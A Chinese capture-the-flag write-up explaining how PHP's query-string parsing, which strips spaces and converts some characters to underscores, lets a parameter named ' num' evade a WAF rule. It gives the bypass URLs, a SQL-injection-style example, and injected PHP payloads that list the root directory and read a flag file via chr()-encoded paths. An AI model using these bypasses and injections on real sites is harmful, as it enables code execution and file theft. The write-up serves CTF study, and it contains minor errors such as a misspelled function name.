本题考点
1.PHP的字符串解析特性
我们知道PHP将查询字符串(在URL或正文中)转换为内部$_GET
或的关联数组$_POST
。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截,那么我们就可以用以下语句绕过:
/news.php?%20news[id%00=42"+AND+1=0–
上述PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]中。
PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:
1.删除空白符
2.将某些字符转化为下划线(包括空格)
源码中可得是waf
如图,也可得payload构建方式
因为waf的存在,我们输入非数字是会被拦截的
所以
calc.php? num= abcd
即可绕过检查
因为waf检查’num’,而不是变量’ num’
但php却会删去空格符,让其重新变为num,这样就可以实现非法字符的上传
scanfdir()查看目录
/ 已被过滤,用chr(47)代替
查看目录
calc.php? num=1;print_r(scandir(chr(47)))
然后
calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
这里说明一下,print_r()与var_dump()都可以用于输出
file()与file_get_congents()也都可以用于读取目录